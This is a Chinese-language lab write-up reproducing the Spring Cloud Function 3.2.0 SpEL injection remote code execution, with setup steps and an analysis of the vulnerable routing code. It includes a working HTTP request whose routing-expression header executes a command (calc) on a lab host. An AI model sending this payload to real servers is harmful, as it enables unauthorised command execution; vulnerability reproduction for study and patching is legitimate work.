Spring Cloud Function 漏洞复现

一、环境搭建

https://codeload.github.com/spring-cloud/spring-cloud-function/zip/refs/tags/v3.2.0

下载当前的压缩包直接用IDEA 打开

spring-cloud-function-samples/function-sample-pojo  

就可以执行运行环境

进行访问

二、修改配置文件的RCE方式

然后随意路由

三、默认配置文件下的RCE

POST /functionRouter HTTP/1.1
Host: 192.168.66.101:8080
spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("calc")

Content-Type: application/x-www-form-urlencoded
Content-Length: 5

test 

四、代码分析

从Test RoutingFunctionTests.java 

https://github.com/spring-cloud/spring-cloud-function/commit/dc5128b80c6c04232a081458f637c81a64fa9b52

好像是调用apply 函数。传递了Message 类型的input 

那么从这里打断点

实际上触发的代码块为：

function = this.functionFromExpression((String)message.getHeaders().get("spring.cloud.function.routing-expression"), message);

往下更进

    private FunctionInvocationWrapper functionFromExpression(String routingExpression, Object input) {
        Expression expression = this.spelParser.parseExpression(routingExpression);
        String functionName = (String)expression.getValue(this.evalContext, input, String.class);
        Assert.hasText(functionName, "Failed to resolve function name based on routing expression '" + this.functionProperties.getRoutingExpression() + "'");
        FunctionInvocationWrapper function = (FunctionInvocationWrapper)this.functionCatalog.lookup(functionName);
        Assert.notNull(function, "Failed to lookup function to route to based on the expression '" + this.functionProperties.getRoutingExpression() + "' whcih resolved to '" + functionName + "' function name.");
        if (logger.isInfoEnabled()) {
            logger.info("Resolved function from provided [routing-expression]  " + routingExpression);
        }

        return function;
    }

参考：

https://mp.weixin.qq.com/s/ssHcLC72wZqzt-ei_ZoLwg

https://wx.zsxq.com/dweb2/index/topic_detail/184254458222452